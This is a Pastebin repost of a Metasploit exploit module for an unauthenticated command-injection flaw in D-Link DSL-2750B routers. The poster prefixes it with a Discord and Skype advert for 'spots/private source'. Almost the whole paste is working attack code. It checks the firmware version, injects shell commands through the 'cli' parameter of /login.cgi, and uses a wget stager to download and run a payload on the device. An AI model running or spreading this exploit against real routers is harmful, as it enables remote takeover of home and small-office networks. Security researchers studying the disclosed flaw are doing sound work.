daily pastebin goal
89%
SHARE
TWEET

[D-Link DSL-2750B EXPLOIT ][MS]

xB4ckdoorREAL Nov 7th, 2018 (edited) 106 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##DISCORD: https://discord.gg/QDy3bUy OR SKYPE: b4ckdoor.porn [for spots/private source and more.]
  2.  
  3. # This module requires Metasploit: https://metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. class MetasploitModule < Msf::Exploit::Remote
  8.   Rank = GreatRanking
  9.  
  10.   include Msf::Exploit::Remote::HttpClient
  11.   include Msf::Exploit::CmdStager
  12.  
  13.   def initialize(info = {})
  14.     super(update_info(info,
  15.       'Name'           => 'D-Link DSL-2750B OS Command Injection',
  16.       'Description'    => %q(
  17.         This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
  18.         Vulnerability can be exploited through "cli" parameter that is directly used to invoke
  19.         "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
  20.       ),
  21.       'Author/Reposting'         =>
  22.         [
  23.           'p@ql', # vulnerability discover
  24.           'b4',   #reposting
  25.         ],
  26.       'License'        => MSF_LICENSE,
  27.       'References'     =>
  28.         [
  29.           ['PACKETSTORM', 135706],
  30.           ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
  31.           ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
  32.         ],
  33.       'Targets'        =>
  34.         [
  35.           [
  36.             'Linux mipsbe Payload',
  37.             {
  38.               'Arch' => ARCH_MIPSBE,
  39.               'Platform' => 'linux'
  40.             }
  41.           ],
  42.           [
  43.             'Linux mipsel Payload',
  44.             {
  45.               'Arch' => ARCH_MIPSLE,
  46.               'Platform' => 'linux'
  47.             }
  48.           ]
  49.         ],
  50.       'DisclosureDate'  => 'Feb 5 2016',
  51.       'DefaultTarget'   => 0))
  52.  
  53.     deregister_options('CMDSTAGER::FLAVOR')
  54.   end
  55.  
  56.   def check
  57.     res = send_request_cgi(
  58.       'method' => 'GET',
  59.       'uri' => '/ayefeaturesconvert.js'
  60.     )
  61.  
  62.     unless res
  63.       vprint_error('Connection failed')
  64.       return CheckCode::Unknown
  65.     end
  66.  
  67.     unless res.code.to_i == 200 && res.body.include?('DSL-2750')
  68.       vprint_status('Remote host is not a DSL-2750')
  69.       return CheckCode::Safe
  70.     end
  71.  
  72.     if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
  73.       version = Regexp.last_match[1]
  74.       vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
  75.       if version >= "1.01" && version <= "1.03"
  76.         return Exploit::CheckCode::Appears
  77.       end
  78.     end
  79.  
  80.     CheckCode::Safe
  81.   rescue ::Rex::ConnectionError
  82.     vprint_error('Connection failed')
  83.     return CheckCode::Unknown
  84.   end
  85.  
  86.   def execute_command(cmd, _opts)
  87.     payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
  88.     send_request_cgi(
  89.       {
  90.         'method' => 'GET',
  91.         'uri' => '/login.cgi',
  92.         'vars_get' => {
  93.           'cli' => "#{payload}$"
  94.         },
  95.         'encode_params' => false
  96.       },
  97.       5
  98.     )
  99.   rescue ::Rex::ConnectionError
  100.     fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
  101.   end
  102.  
  103.   def exploit
  104.     print_status("#{peer} Checking target version...")
  105.  
  106.     unless check == Exploit::CheckCode::Appears
  107.       fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
  108.     end
  109.  
  110.     execute_cmdstager(
  111.       flavor: :wget,
  112.       linemax: 200
  113.     )
  114.   end
  115. end
  116.  
  117. # [2018-11-07]
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top